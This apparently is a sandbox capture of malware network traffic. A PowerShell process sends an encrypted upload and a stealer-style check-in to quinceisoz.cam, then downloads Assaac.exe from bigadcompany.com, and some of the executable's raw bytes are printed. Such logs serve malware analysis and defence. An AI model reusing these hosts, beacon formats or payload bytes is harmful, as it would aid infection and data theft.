                                                      2025-01-08 12:56:40 UTC15331OUTData Raw: 07 11 d7 9d 05 a2 ff 6a f7 48 8f b2 a0 f8 67 55 f9 1b 7d ba 7b ff d6 48 0f e5 da 65 60 08 6a 0a 5e fc e7 6d f6 d5 51 83 cf 58 5c 64 5e 12 a4 30 15 2c b7 76 34 bf 3b 8c 13 97 30 df bb a2 4e d9 d5 6f ac a4 12 c7 8f b0 76 f8 d2 16 18 f8 9d bc 05 3f 75 26 7c a7 1e 4c 3d 94 42 63 8d ba a8 af f4 4c bc 4a 07 4d 1f 3b ee ef 9e 1b 99 98 cc ab 59 a1 cc a6 b2 6b d3 23 59 25 a3 01 4c c5 74 cf 21 b6 74 dc 6e 38 22 bf b4 ef 91 3f 63 d0 61 de 9e 0a 5f 96 72 ef 4c f6 d4 ad 5c 90 b5 75 da 8b ff 42 a9 b6 f2 b1 a6 0d cd 0c 7f 80 c5 6d 73 6e 6d 5d 2e 7f a0 2b 59 36 37 ba b9 db 74 a8 f2 85 9d 9e 68 95 e8 ec b7 8d d1 aa 85 64 66 57 55 9b 17 ab 91 cd 73 74 3c 68 77 32 55 64 3b 23 e3 d1 82 6f 77 ff c4 84 8e 76 f3 2f 6c 73 d3 a1 41 5e ba fa df cd d5 cd bc 44 ee 49 85 83 5f b2 31
                                                      Data Ascii: jHgU}{He`j^mQX\d^0,v4;0Nov?u&|L=BcLJM;Yk#Y%Lt!tn8"?ca_rL\uBmsnm].+Y67thdfWUst<hw2Ud;#owv/lsA^DI_1
                                                      2025-01-08 12:56:40 UTC15331OUTData Raw: a7 4b 1b 25 2c 34 c9 32 38 14 b9 96 a3 8d 96 d4 00 b2 f8 4b e4 98 cd 0b 32 e4 11 86 c4 d2 af 1b b9 f3 99 e1 a5 37 2e 9f 24 af 44 89 87 7b e5 a6 9b 84 89 43 63 2c 83 38 5c 34 25 ff 10 5c 34 61 ac 50 15 19 9c 0a b9 76 3d cb 1f 0c 1d f8 01 a9 29 b4 d7 dd 2b 60 d3 cf a8 c7 04 12 6b 68 cd 50 36 c3 5c 1a 8e 40 f1 0a 13 6b 67 1a 1e 87 72 4f 7e f2 ee 43 a5 46 c0 ee ec 0e 6b b5 cc 6a 45 76 be 85 c5 4a a4 0d cc 05 be af 35 1c 40 44 38 da 06 3c df 4b f3 d8 3c 4b e2 fa 2e 9d 7c d4 e0 b8 06 3d 4b 1c 8e 0c d2 fe a1 26 ba b6 63 7f 7b e5 a4 58 bb d1 bd cb 59 4c 7b fe 8f 8e 98 d0 54 1c a5 d0 76 24 24 17 f3 62 a0 c2 c0 83 e7 e9 85 cb dc 93 81 ee 35 38 fb 88 83 ec 94 14 4e f4 d2 53 88 76 6a e2 14 b5 5a bd 8f d0 45 19 96 d0 e0 e0 57 f4 fd 2b 76 43 5a 95 25 73 2b 67 57 f4 f4
                                                      Data Ascii: K%,428K27.$D{Cc,8\4%\4aPv=)+`khP6\@kgrO~CFkjEvJ5@D8<K<K.|=K&c{XYL{Tv$$b58NSvjZEW+vCZ%s+gW
                                                      2025-01-08 12:56:40 UTC15331OUTData Raw: be 1d e8 b2 2f ef cd 5f 89 bd 0f 37 74 a8 93 a3 60 5c 9c 8e 1c c1 cf ee 5d 3f 96 88 8b e9 12 fa fd 89 6d 3d e1 e4 c2 7e 19 e8 78 15 ae d9 b9 cb 09 0e 87 a3 65 c4 04 36 82 1b 58 aa 52 59 41 7f fe a5 3b 60 69 0b 0d a9 5c 09 61 e8 f9 db 74 84 ff de 7d b3 e6 a2 44 9f 87 98 43 f6 0e 25 b9 0a c5 7b 6a cf 07 34 b4 b1 bd c1 50 fc cd fe 13 d2 cb d4 6d 19 fc f1 ba d5 0e 06 c3 6d 74 82 69 ce 59 01 7b 99 c8 a9 30 85 bb 62 ea 90 ac 7d 70 e7 90 95 d6 3c 9b 7e 88 1b 7f 99 fd 9e 5f 8c e7 13 39 c0 e0 27 f7 84 28 52 8b e6 6d f0 62 b3 d2 cb 66 70 08 ec ff b0 45 ed ca d5 b5 6f 87 e1 bd 0a c4 2e 6d d9 44 55 c3 1c 74 e7 eb be 04 2f 07 13 98 9b eb 7d 1e 0a e0 b2 bb 7c 08 a7 98 d1 b5 5e 13 34 ce 4f 74 12 ae 04 d7 da e0 9d cd be 41 a0 ae 2c cd 5f 75 24 ac b1 96 5a 45 1f 45 3b 5f
                                                      Data Ascii: /_7t`\]?m=~xe6XRYA;`i\at}DC%{j4PmmtiY{0b}p<~_9'(RmbfpEo.mDUt/}|^4OtA,_u$ZEE;_
                                                      2025-01-08 12:56:42 UTC1139INHTTP/1.1 200 OK
                                                      Date: Wed, 08 Jan 2025 12:56:42 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Set-Cookie: PHPSESSID=47388kfumgtq6qlf3pjrvdqadt; expires=Sun, 04 May 2025 06:43:21 GMT; Max-Age=9999999; path=/
                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                      Pragma: no-cache
                                                      X-Frame-Options: DENY
                                                      X-Content-Type-Options: nosniff
                                                      X-XSS-Protection: 1; mode=block
                                                      cf-cache-status: DYNAMIC
                                                      vary: accept-encoding
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tuQ%2FUT2ig6%2BTVk9nEDcghTElIT6RkvFaGwtLdPlES%2BywznERZkhKGVFiFaX8PB6kXtOIk8S%2BObg0SGr%2FAvSrjLSWBpCrYpU%2FEwhgd4ap2iWywrP1zRf7yZPkhTX2CtgWTQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8fec5957687d0f5b-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1613&min_rtt=1611&rtt_var=608&sent=291&recv=605&lost=0&retrans=0&sent_bytes=3044&recv_bytes=587991&delivery_rate=2690417&cwnd=222&unsent_bytes=0&cid=aef5a3ff2a9ab79c&ts=1644&x=0"


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      8192.168.2.749984104.21.112.14437508C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-08 12:56:42 UTC262OUTPOST /api HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Content-Type: application/x-www-form-urlencoded
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                      Content-Length: 82
                                                      Host: quinceisoz.cam
                                                      2025-01-08 12:56:42 UTC82OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 57 47 36 49 36 53 2d 2d 77 65 62 35 35 26 6a 3d 26 68 77 69 64 3d 33 42 31 35 31 30 43 38 32 42 32 35 42 34 43 42 31 38 34 46 34 44 30 42 37 30 45 42 34 32 43 31
                                                      Data Ascii: act=get_message&ver=4.0&lid=WG6I6S--web55&j=&hwid=3B1510C82B25B4CB184F4D0B70EB42C1
                                                      2025-01-08 12:56:43 UTC1124INHTTP/1.1 200 OK
                                                      Date: Wed, 08 Jan 2025 12:56:43 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Set-Cookie: PHPSESSID=rmcqc92o41jfu2j2u4tum35od7; expires=Sun, 04 May 2025 06:43:22 GMT; Max-Age=9999999; path=/
                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                      Pragma: no-cache
                                                      X-Frame-Options: DENY
                                                      X-Content-Type-Options: nosniff
                                                      X-XSS-Protection: 1; mode=block
                                                      cf-cache-status: DYNAMIC
                                                      vary: accept-encoding
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=todlZzrG3jGz3OfqBGZTs%2BUueBYsLZQ9Xc7GudAlKqjz57Xie8tPIQ0B7e9nUVUbOjbwwi7Ji08pfEwwCchHxMnzXDuzcwSMtFab0WYzFpraY%2FpU9ZV44URKokAa7sS8Dg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8fec59654d52424b-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2210&min_rtt=1587&rtt_var=1040&sent=6&recv=6&lost=0&retrans=0&sent_bytes=3045&recv_bytes=980&delivery_rate=2759924&cwnd=249&unsent_bytes=0&cid=751475d1d452511e&ts=469&x=0"
                                                      2025-01-08 12:56:43 UTC245INData Raw: 33 36 61 34 0d 0a 47 61 64 76 70 31 4e 54 47 6d 31 4f 6a 4b 48 31 4f 45 69 74 4c 32 70 51 55 41 39 48 67 33 35 64 5a 57 42 57 39 77 79 31 48 32 39 43 33 45 33 53 63 57 6b 34 42 54 72 34 30 59 59 43 46 49 4a 7a 52 54 49 35 61 43 62 6e 48 54 49 49 45 44 65 5a 64 5a 74 38 41 48 54 37 51 4f 59 67 49 48 73 4d 4c 61 4c 45 6a 56 31 71 67 51 30 4d 4a 48 49 31 64 36 39 63 4f 45 64 61 5a 6f 6f 67 7a 6a 30 4a 62 59 56 56 6c 6e 39 78 66 30 39 30 76 59 33 58 58 47 71 58 44 52 77 52 4d 56 59 75 39 68 4d 31 49 6a 67 66 73 6d 75 42 5a 69 5a 39 35 67 54 4b 42 6a 52 7a 42 41 50 30 37 35 39 76 4a 39 70 46 47 79 63 39 66 67 2f 79 52 6a 59 63 42 67 61 50 56 50 70 63 4a 43 2f 73 4b 76 30 77 4e 46 6b 70 4a 4d 58 4a 78 58 73 62 39 33 77 70 47 78 6c
                                                      Data Ascii: 36a4Gadvp1NTGm1OjKH1OEitL2pQUA9Hg35dZWBW9wy1H29C3E3ScWk4BTr40YYCFIJzRTI5aCbnHTIIEDeZdZt8AHT7QOYgIHsMLaLEjV1qgQ0MJHI1d69cOEdaZoogzj0JbYVVln9xf090vY3XXGqXDRwRMVYu9hM1IjgfsmuBZiZ95gTKBjRzBAP0759vJ9pFGyc9fg/yRjYcBgaPVPpcJC/sKv0wNFkpJMXJxXsb93wpGxl
                                                      2025-01-08 12:56:43 UTC1369INData Raw: 31 41 72 45 77 50 41 38 6a 42 6f 56 50 31 48 41 4b 61 39 34 37 37 57 74 6b 62 53 6f 6a 78 64 4f 46 56 78 72 42 56 69 67 5a 48 30 49 75 79 79 38 58 4c 77 77 66 76 6d 50 66 55 6a 74 41 6c 68 37 71 47 6d 56 70 4a 7a 2f 6b 6c 71 31 79 42 63 4e 56 47 54 67 37 5a 69 2f 4d 46 51 73 67 4c 47 36 62 51 34 45 73 4b 6d 7a 30 42 39 34 63 50 6c 49 2f 43 37 37 73 70 33 59 74 32 58 30 54 50 51 4e 45 49 65 42 4c 46 68 56 56 4c 4c 35 47 77 32 30 5a 59 4d 4d 68 31 42 73 51 54 68 78 36 2f 63 61 43 61 69 62 37 56 6a 41 7a 59 56 63 6a 36 45 39 32 44 79 4d 47 77 46 6a 2b 63 41 6f 74 33 6a 66 70 61 32 64 79 47 48 62 44 6b 6f 56 58 47 73 46 57 4b 42 6b 66 51 69 37 4a 4c 78 63 76 4b 42 75 7a 59 38 38 76 4f 30 43 58 48 75 6f 61 5a 57 6b 70 50 2b 53 58 67 33 49 46 77 31 55 63 45 6a
                                                      Data Ascii: 1ArEwPA8jBoVP1HAKa9477WtkbSojxdOFVxrBVigZH0Iuyy8XLwwfvmPfUjtAlh7qGmVpJz/klq1yBcNVGTg7Zi/MFQsgLG6bQ4EsKmz0B94cPlI/C77sp3Yt2X0TPQNEIeBLFhVVLL5Gw20ZYMMh1BsQThx6/caCaib7VjAzYVcj6E92DyMGwFj+cAot3jfpa2dyGHbDkoVXGsFWKBkfQi7JLxcvKBuzY88vO0CXHuoaZWkpP+SXg3IFw1UcEj
                                                      2025-01-08 12:56:43 UTC1369INData Raw: 4f 32 38 72 41 54 79 30 51 38 64 63 44 6e 62 43 48 64 34 48 47 53 4a 61 4f 63 76 4d 76 45 6f 34 77 6e 30 47 4b 52 4a 47 43 4d 34 58 46 54 51 71 48 4a 74 46 2f 48 41 46 56 50 4d 32 6c 69 49 65 55 31 73 39 78 74 43 64 44 6a 37 6e 59 67 51 71 4a 6b 34 6d 32 68 63 6f 43 41 67 52 72 30 58 77 65 46 74 67 37 67 76 6d 4f 44 35 50 43 69 66 6c 37 49 31 32 49 76 70 41 48 54 6f 68 65 43 72 79 4e 69 78 64 43 79 2b 52 51 34 31 64 48 33 44 73 57 63 59 57 43 58 6b 4b 48 63 6a 4c 76 46 42 34 37 6e 77 77 41 78 4e 45 44 76 6b 37 62 79 73 42 50 4c 52 44 78 31 77 4f 64 73 49 64 33 67 63 5a 49 6c 6f 35 79 38 79 38 53 6a 6a 43 66 51 59 70 45 6b 59 49 7a 68 63 56 4e 43 6f 63 6d 30 58 38 63 41 56 55 38 7a 61 57 49 68 35 54 57 7a 33 47 30 4a 30 4f 50 75 64 69 42 43 6f 6d 54 69 62
                                                      Data Ascii: O28rATy0Q8dcDnbCHd4HGSJaOcvMvEo4wn0GKRJGCM4XFTQqHJtF/HAFVPM2liIeU1s9xtCdDj7nYgQqJk4m2hcoCAgRr0XweFtg7gvmOD5PCifl7I12IvpAHToheCryNixdCy+RQ41dH3DsWcYWCXkKHcjLvFB47nwwAxNEDvk7bysBPLRDx1wOdsId3gcZIlo5y8y8SjjCfQYpEkYIzhcVNCocm0X8cAVU8zaWIh5TWz3G0J0OPudiBComTib
                                                      2025-01-08 12:56:43 UTC1369INData Raw: 43 68 6a 70 48 72 73 4c 77 59 6f 79 46 72 2b 43 6a 6c 43 46 33 6e 32 37 35 78 55 41 65 67 63 43 51 6f 56 66 41 62 4e 47 52 70 57 4c 43 47 46 66 49 4e 37 4c 56 44 6f 49 73 39 72 41 33 4d 38 41 4d 54 62 77 30 49 78 39 55 59 47 49 52 31 47 50 75 6c 4f 61 44 49 55 4a 59 56 64 2f 48 35 59 52 59 67 44 79 54 63 33 56 6a 73 65 31 4d 43 6c 43 58 37 45 62 69 73 35 4d 33 39 79 31 69 51 2b 45 77 77 64 6a 54 79 45 4e 41 68 4d 30 43 44 4c 50 52 6c 77 44 77 44 72 31 6f 31 71 4d 63 35 72 4a 54 6b 63 5a 79 62 43 44 52 38 56 4f 44 4f 37 4e 63 52 49 4f 33 58 65 47 63 41 34 47 57 6f 73 4b 62 72 6d 67 67 45 6b 39 55 63 46 47 67 42 4c 49 66 56 4e 43 69 41 32 4f 6f 5a 62 35 31 46 57 63 63 67 44 33 54 64 6e 62 79 67 55 70 35 4f 33 57 79 72 70 58 51 38 47 42 55 42 30 73 69 5a 76
                                                      Data Ascii: ChjpHrsLwYoyFr+CjlCF3n275xUAegcCQoVfAbNGRpWLCGFfIN7LVDoIs9rA3M8AMTbw0Ix9UYGIR1GPulOaDIUJYVd/H5YRYgDyTc3Vjse1MClCX7Ebis5M39y1iQ+EwwdjTyENAhM0CDLPRlwDwDr1o1qMc5rJTkcZybCDR8VODO7NcRIO3XeGcA4GWosKbrmggEk9UcFGgBLIfVNCiA2OoZb51FWccgD3TdnbygUp5O3WyrpXQ8GBUB0siZv
                                                      2025-01-08 12:56:43 UTC1369INData Raw: 4a 74 33 30 31 5a 56 4e 31 64 2f 67 41 65 56 31 6f 6f 33 35 65 30 41 42 37 66 57 7a 77 70 4e 6b 49 54 78 43 63 79 41 42 59 76 67 6b 48 36 4b 43 42 68 31 67 72 66 49 41 55 6f 46 77 58 72 39 35 38 4e 66 4f 41 66 4f 68 49 38 52 68 37 37 4e 32 77 64 4f 57 2b 2f 58 66 63 70 52 46 6a 45 4c 65 41 6b 43 6c 63 44 4e 50 2b 57 73 6c 6c 2f 36 6c 63 43 46 69 5a 74 42 65 51 52 4a 43 78 5a 62 6f 52 6e 68 69 30 75 66 64 49 62 38 7a 51 2f 65 78 55 49 78 2f 47 6d 54 77 33 49 56 51 6b 44 4f 6b 52 73 36 6b 64 70 56 44 6b 51 70 47 33 44 5a 6a 74 31 34 31 7a 6c 4a 68 46 33 4f 6e 62 75 30 59 4e 62 4a 73 52 74 4d 7a 64 69 56 54 33 42 43 77 46 4b 4c 78 43 4f 51 4d 55 6e 57 57 37 74 58 50 49 66 50 6c 77 45 4b 64 6e 47 72 57 42 39 2f 58 38 69 41 78 74 72 48 65 41 50 4e 79 67 30 59
                                                      Data Ascii: Jt301ZVN1d/gAeV1oo35e0AB7fWzwpNkITxCcyABYvgkH6KCBh1grfIAUoFwXr958NfOAfOhI8Rh77N2wdOW+/XfcpRFjELeAkClcDNP+Wsll/6lcCFiZtBeQRJCxZboRnhi0ufdIb8zQ/exUIx/GmTw3IVQkDOkRs6kdpVDkQpG3DZjt141zlJhF3Onbu0YNbJsRtMzdiVT3BCwFKLxCOQMUnWW7tXPIfPlwEKdnGrWB9/X8iAxtrHeAPNyg0Y
                                                      2025-01-08 12:56:43 UTC1369INData Raw: 30 4e 58 71 65 57 73 34 72 47 6e 55 43 66 37 76 6c 78 6e 4a 6a 37 31 34 34 41 57 6b 2b 64 4d 34 51 4e 79 6b 4d 46 4a 4e 2f 32 69 64 59 57 50 55 6a 77 78 4a 67 58 69 67 42 79 76 61 6e 62 69 2f 36 64 52 73 63 47 47 41 77 7a 42 77 79 46 31 4a 6b 6b 6c 43 61 4c 54 64 36 33 52 79 52 46 6a 5a 66 4b 48 6a 2f 2b 34 39 36 44 39 70 32 4a 7a 34 71 50 53 6a 62 46 54 49 41 46 54 36 62 54 6f 31 59 56 6e 66 4d 49 38 34 46 59 6b 6b 49 4e 4f 44 49 6f 32 41 64 36 33 38 6c 50 78 35 2f 42 64 6f 4c 46 52 52 59 50 59 35 71 35 58 34 48 66 50 51 69 30 54 49 55 54 79 41 70 37 70 4f 51 61 52 36 5a 5a 56 6b 4a 46 6c 67 53 38 6b 73 62 43 43 34 33 73 79 66 51 63 54 64 4a 79 79 62 31 5a 43 42 69 4b 51 76 44 35 36 31 78 45 74 35 32 4f 44 49 56 54 41 7a 67 54 44 51 39 4d 52 79 39 59 49
                                                      Data Ascii: 0NXqeWs4rGnUCf7vlxnJj7144AWk+dM4QNykMFJN/2idYWPUjwxJgXigByvanbi/6dRscGGAwzBwyF1JkklCaLTd63RyRFjZfKHj/+496D9p2Jz4qPSjbFTIAFT6bTo1YVnfMI84FYkkINODIo2Ad638lPx5/BdoLFRRYPY5q5X4HfPQi0TIUTyAp7pOQaR6ZZVkJFlgS8ksbCC43syfQcTdJyyb1ZCBiKQvD561xEt52ODIVTAzgTDQ9MRy9YI
                                                      2025-01-08 12:56:43 UTC1369INData Raw: 69 44 37 55 49 32 46 52 58 41 33 59 34 72 31 79 66 75 39 70 4b 77 6b 58 61 78 75 73 4a 68 77 51 41 78 57 2b 5a 49 56 63 50 45 50 30 44 63 34 62 47 55 49 46 4b 75 76 47 77 47 78 78 37 6c 59 45 43 53 4a 61 44 63 34 33 50 67 73 50 45 36 4a 31 35 57 64 63 49 4d 51 73 6b 69 51 61 63 79 55 66 78 75 75 5a 63 6a 33 6b 54 41 55 33 46 6a 38 45 78 78 49 53 4d 43 77 64 6b 32 58 42 54 67 52 75 6b 52 62 43 4f 79 74 39 47 43 66 6b 35 71 64 70 42 4d 4e 75 41 78 6b 30 54 69 7a 75 4b 7a 49 39 45 7a 4c 43 4f 49 78 49 4b 30 44 6b 48 74 41 2b 49 69 4d 4d 46 2f 36 51 67 33 55 55 67 6c 63 77 49 68 46 68 49 76 41 70 4a 54 46 59 47 63 4d 38 31 6b 77 47 62 64 4d 4e 77 6a 67 71 4d 51 73 41 2b 35 6d 78 41 58 37 56 53 68 68 37 4e 46 6f 41 73 55 64 74 48 7a 78 35 77 6a 33 70 4d 46 64
                                                      Data Ascii: iD7UI2FRXA3Y4r1yfu9pKwkXaxusJhwQAxW+ZIVcPEP0Dc4bGUIFKuvGwGxx7lYECSJaDc43PgsPE6J15WdcIMQskiQacyUfxuuZcj3kTAU3Fj8ExxISMCwdk2XBTgRukRbCOyt9GCfk5qdpBMNuAxk0TizuKzI9EzLCOIxIK0DkHtA+IiMMF/6Qg3UUglcwIhFhIvApJTFYGcM81kwGbdMNwjgqMQsA+5mxAX7VShh7NFoAsUdtHzx5wj3pMFd
                                                      2025-01-08 12:56:43 UTC1369INData Raw: 67 39 38 49 30 59 34 34 4d 71 78 54 68 4b 56 65 51 64 67 50 56 38 6f 77 53 6f 42 53 68 41 41 6c 46 43 61 66 41 35 79 6c 7a 32 4d 42 6a 70 30 48 41 2f 42 34 4c 6c 70 4b 76 64 33 49 77 6b 6d 52 44 66 46 4b 42 34 51 4e 79 53 30 62 63 52 4c 48 6d 44 56 47 4f 35 6b 48 46 73 6b 65 76 37 52 6d 6d 49 78 6d 6d 77 64 4d 78 52 6d 48 39 49 30 4c 46 5a 55 45 63 41 37 33 55 63 39 4b 66 34 74 37 32 55 64 58 53 59 72 36 64 4f 2b 43 44 76 4f 57 53 73 78 43 57 41 2b 75 78 64 6f 56 79 6b 61 74 6c 76 63 56 67 74 59 7a 44 66 4f 43 69 64 34 4a 48 7a 4b 77 73 55 49 4b 64 78 32 49 79 41 61 4f 43 37 68 52 67 30 4d 46 52 69 4e 55 4a 6f 6f 48 48 4f 66 43 2f 74 38 43 31 73 59 4c 63 2f 6f 6e 51 67 4c 2f 6e 55 35 45 6d 64 46 64 4d 73 4f 46 7a 4d 4f 41 5a 4a 6e 6e 6c 77 42 66 2f 38 58
                                                      Data Ascii: g98I0Y44MqxThKVeQdgPV8owSoBShAAlFCafA5ylz2MBjp0HA/B4LlpKvd3IwkmRDfFKB4QNyS0bcRLHmDVGO5kHFskev7RmmIxmmwdMxRmH9I0LFZUEcA73Uc9Kf4t72UdXSYr6dO+CDvOWSsxCWA+uxdoVykatlvcVgtYzDfOCid4JHzKwsUIKdx2IyAaOC7hRg0MFRiNUJooHHOfC/t8C1sYLc/onQgL/nU5EmdFdMsOFzMOAZJnnlwBf/8X
                                                      2025-01-08 12:56:43 UTC1369INData Raw: 49 6e 4e 2b 75 4b 76 6e 45 61 79 6b 4d 53 42 54 73 39 4c 75 55 73 45 43 41 33 49 36 5a 6d 67 6e 67 42 63 4f 38 62 30 44 67 68 52 6b 49 65 2f 75 4f 45 56 51 4f 66 58 69 38 6c 4d 32 49 41 78 77 59 79 41 67 6b 56 70 46 62 6d 54 53 52 54 38 53 72 64 42 54 49 70 46 42 37 44 34 70 4e 54 4c 5a 78 47 4f 54 6c 6f 55 32 6a 61 4f 57 6b 4b 45 67 53 59 57 2f 4e 6d 49 6e 62 33 44 73 34 58 50 46 41 4d 43 4d 57 58 6d 6c 59 64 2b 57 49 38 49 69 56 47 47 36 77 33 46 31 30 49 59 4b 39 47 2f 6d 30 56 49 63 41 4e 6b 44 6f 38 56 51 55 48 31 4f 75 59 58 33 44 45 5a 69 4d 42 50 44 77 53 36 51 38 30 4d 79 49 59 6e 56 76 48 65 56 39 2b 2f 77 6e 43 4b 67 6c 75 4e 77 33 65 6b 4b 46 78 48 2f 64 6e 47 53 6b 2b 58 54 54 56 42 6d 35 54 4d 6d 53 48 59 50 68 33 48 30 6a 42 42 66 4d 38 50
                                                      Data Ascii: InN+uKvnEaykMSBTs9LuUsECA3I6ZmgngBcO8b0DghRkIe/uOEVQOfXi8lM2IAxwYyAgkVpFbmTSRT8SrdBTIpFB7D4pNTLZxGOTloU2jaOWkKEgSYW/NmInb3Ds4XPFAMCMWXmlYd+WI8IiVGG6w3F10IYK9G/m0VIcANkDo8VQUH1OuYX3DEZiMBPDwS6Q80MyIYnVvHeV9+/wnCKgluNw3ekKFxH/dnGSk+XTTVBm5TMmSHYPh3H0jBBfM8P


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      9192.168.2.749985192.250.235.304437508C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-08 12:56:44 UTC201OUTGET /Assaac.exe HTTP/1.1
                                                      Connection: Keep-Alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                      Host: bigadcompany.com
                                                      2025-01-08 12:56:44 UTC525INHTTP/1.1 200 OK
                                                      Connection: close
                                                      cache-control: public, max-age=2592000,public
                                                      expires: Fri, 07 Feb 2025 12:56:44 GMT
                                                      content-type: application/x-msdownload
                                                      last-modified: Sun, 05 Jan 2025 14:07:54 GMT
                                                      accept-ranges: bytes
                                                      content-length: 598528
                                                      date: Wed, 08 Jan 2025 12:56:44 GMT
                                                      server: LiteSpeed
                                                      vary: User-Agent,Accept-Encoding
                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                      2025-01-08 12:56:45 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 74 94 29 bb 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 30 00 00 f2 08 00 00 2e 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 09 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00
                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdt)"0. @ ``@@
                                                      2025-01-08 12:56:45 UTC16384INData Raw: 6f 1c 00 70 a2 25 20 d3 01 00 00 72 7d 1c 00 70 a2 25 20 d4 01 00 00 72 8b 1c 00 70 a2 25 20 d5 01 00 00 72 9b 1c 00 70 a2 25 20 d6 01 00 00 72 a5 1c 00 70 a2 25 20 d7 01 00 00 72 b3 1c 00 70 a2 25 20 d8 01 00 00 72 c1 1c 00 70 a2 25 20 d9 01 00 00 72 d1 1c 00 70 a2 25 20 da 01 00 00 72 dd 1c 00 70 a2 25 20 db 01 00 00 72 eb 1c 00 70 a2 25 20 dc 01 00 00 72 f9 1c 00 70 a2 25 20 dd 01 00 00 72 0b 1d 00 70 a2 25 20 de 01 00 00 72 19 1d 00 70 a2 25 20 df 01 00 00 72 27 1d 00 70 a2 25 20 e0 01 00 00 72 31 1d 00 70 a2 25 20 e1 01 00 00 72 41 1d 00 70 a2 25 20 e2 01 00 00 72 51 1d 00 70 a2 25 20 e3 01 00 00 72 5f 1d 00 70 a2 25 20 e4 01 00 00 72 6d 1d 00 70 a2 25 20 e5 01 00 00 72 7d 1d 00 70 a2 25 20 e6 01 00 00 72 8b 1d 00 70 a2 25 20 e7 01 00 00 72 99 1d 00
                                                      Data Ascii: op% r}p% rp% rp% rp% rp% rp% rp% rp% rp% rp% rp% rp% r'p% r1p% rAp% rQp% r_p% rmp% r}p% rp% r
                                                      2025-01-08 12:56:45 UTC16384INData Raw: a2 25 20 28 07 00 00 72 ab 60 00 70 a2 25 20 29 07 00 00 72 b7 60 00 70 a2 25 20 2a 07 00 00 72 c5 60 00 70 a2 25 20 2b 07 00 00 72 d1 60 00 70 a2 25 20 2c 07 00 00 72 e1 60 00 70 a2 25 20 2d 07 00 00 72 f3 60 00 70 a2 25 20 2e 07 00 00 72 fd 60 00 70 a2 25 20 2f 07 00 00 72 09 61 00 70 a2 25 20 30 07 00 00 72 19 61 00 70 a2 25 20 31 07 00 00 72 27 61 00 70 a2 25 20 32 07 00 00 72 33 61 00 70 a2 25 20 33 07 00 00 72 3d 61 00 70 a2 25 20 34 07 00 00 72 45 61 00 70 a2 25 20 35 07 00 00 72 51 61 00 70 a2 25 20 36 07 00 00 72 5d 61 00 70 a2 25 20 37 07 00 00 72 6d 61 00 70 a2 25 20 38 07 00 00 72 7b 61 00 70 a2 25 20 39 07 00 00 72 87 61 00 70 a2 25 20 3a 07 00 00 72 99 61 00 70 a2 25 20 3b 07 00 00 72 a3 61 00 70 a2 25 20 3c 07 00 00 72 af 61 00 70 a2 25 20
                                                      Data Ascii: % (r`p% )r`p% *r`p% +r`p% ,r`p% -r`p% .r`p% /rap% 0rap% 1r'ap% 2r3ap% 3r=ap% 4rEap% 5rQap% 6r]ap% 7rmap% 8r{ap% 9rap% :rap% ;rap% <rap%
